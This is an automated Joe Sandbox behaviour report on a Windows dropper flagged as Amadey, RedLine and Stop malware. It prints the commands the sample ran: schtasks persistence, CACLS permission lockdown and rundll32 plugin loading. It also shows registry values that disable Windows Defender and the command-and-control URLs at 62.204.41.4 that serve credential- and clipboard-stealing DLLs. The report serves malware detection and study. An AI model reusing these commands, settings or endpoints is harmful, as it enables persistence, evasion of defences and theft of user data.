                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                          Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.9 %
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeAPI call chain: ExitProcess graph end node
                          Source: xriv.exe, 0000000B.00000002.318710664.0000000001688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00942390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137FC58 FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00660D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00857C33 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137A9A1 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137CFB2 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040ADB0 GetProcessHeap,HeapFree,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeMemory allocated: page read and write | page guard
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB6F40 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00946F40 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00946CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006771D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00672658 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01377A74 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01377208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_013638C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01377AFC cpuid
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB7176 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01383C76 _free,_free,_free,GetTimeZoneInformation,_free,
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 6_2_00007FFC9D7D077D GetUserNameA,
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 12.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.xriv.exe.1360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 30.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.4a7e820.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.0.xriv.exe.1360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.4a7e820.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 22.2.rundll32.exe.6d0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts3
                          Native API
                          1
                          Windows Service
                          2
                          Bypass User Access Control
                          21
                          Disable or Modify Tools
                          1
                          Input Capture
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium14
                          Ingress Tool Transfer
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                          System Shutdown/Reboot
                          Default Accounts2
                          Command and Scripting Interpreter
                          1
                          Scheduled Task/Job
                          1
                          Access Token Manipulation
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol1
                          Input Capture
                          Exfiltration Over Bluetooth2
                          Encrypted Channel
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts1
                          Scheduled Task/Job
                          1
                          Registry Run Keys / Startup Folder
                          1
                          Windows Service
                          2
                          Obfuscated Files or Information
                          Security Account Manager2
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                          Non-Application Layer Protocol
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local Accounts1
                          Service Execution
                          1
                          Services File Permissions Weakness
                          111
                          Process Injection
                          2
                          Software Packing
                          NTDS36
                          System Information Discovery
                          Distributed Component Object ModelInput CaptureScheduled Transfer113
                          Application Layer Protocol
                          SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon Script1
                          Scheduled Task/Job
                          1
                          Timestomp
                          LSA Secrets131
                          Security Software Discovery
                          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.common1
                          Registry Run Keys / Startup Folder
                          2
                          Bypass User Access Control
                          Cached Domain Credentials21
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup Items1
                          Services File Permissions Weakness
                          1
                          Masquerading
                          DCSync2
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                          Virtualization/Sandbox Evasion
                          Proc Filesystem1
                          System Owner/User Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Access Token Manipulation
                          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                          Process Injection
                          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                          Services File Permissions Weakness
                          Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                          Rundll32
                          KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 800799 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic 2->65 67 Multi AV Scanner detection for domain / URL 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 9 other signatures 2->71 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 5 other processes 2->16 process3 file4 55 C:\Users\user\AppData\Local\Temp\...\xriv.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\Local\Temp\...\bfCg.exe, PE32 9->57 dropped 18 bfCg.exe 1 4 9->18         started        22 xriv.exe 3 9->22         started        process5 file6 49 C:\Users\user\AppData\Local\Temp\...\nika.exe, PE32 18->49 dropped 51 C:\Users\user\AppData\Local\Temp\...\afCf.exe, PE32 18->51 dropped 73 Multi AV Scanner detection for dropped file 18->73 75 Machine Learning detection for dropped file 18->75 24 afCf.exe 9 1 18->24         started        27 nika.exe 1 1 18->27         started        53 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 22->53 dropped 77 Contains functionality to inject code into remote processes 22->77 29 mnolyk.exe 18 22->29         started        signatures7 process8 dnsIp9 79 Detected unpacking (changes PE section rights) 24->79 81 Detected unpacking (overwrites its own PE header) 24->81 83 Disable Windows Defender notifications (registry) 24->83 85 Disable Windows Defender real time protection (registry) 24->85 63 62.204.41.4, 49718, 49719, 49720 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->63 59 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 29->59 dropped 61 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 29->61 dropped 87 Multi AV Scanner detection for dropped file 29->87 89 Creates an undocumented autostart registry key 29->89 91 Machine Learning detection for dropped file 29->91 93 Uses schtasks.exe or at.exe to add and modify task schedules 29->93 33 cmd.exe 1 29->33         started        35 schtasks.exe 1 29->35         started        37 rundll32.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 33->39         started        41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        47 4 other processes 33->47 45 conhost.exe 35->45         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe67%ReversingLabsWin32.Trojan.Amadey
                          file.exe49%VirustotalBrowse
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll81%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe81%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe54%ReversingLabsWin32.Trojan.Tedy
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe81%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe47%ReversingLabsWin32.Ransomware.Stop
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe82%ReversingLabsByteCode-MSIL.Trojan.Disabler
                          C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll81%ReversingLabsWin32.Trojan.Amadey
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dll0%Avira URL Cloudsafe
                          62.204.41.4/Gol478Ns/index.php12%VirustotalBrowse
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dll2%VirustotalBrowse
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dll17%VirustotalBrowse
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dll100%Avira URL Cloudmalware
                          http://62.204.41.4/Gol478Ns/index.php100%Avira URL Cloudmalware
                          62.204.41.4/Gol478Ns/index.php100%Avira URL Cloudmalware
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dlltrue
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dlltrue
                          • 17%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          62.204.41.4/Gol478Ns/index.phptrue
                          • 12%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          low
                          http://62.204.41.4/Gol478Ns/index.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          62.204.41.4
                          unknownUnited Kingdom
                          30798TNNET-ASTNNetOyMainnetworkFItrue
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:800799
                          Start date and time:2023-02-07 19:59:16 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 50s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:32
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample file name:file.exe
                          Detection:MAL
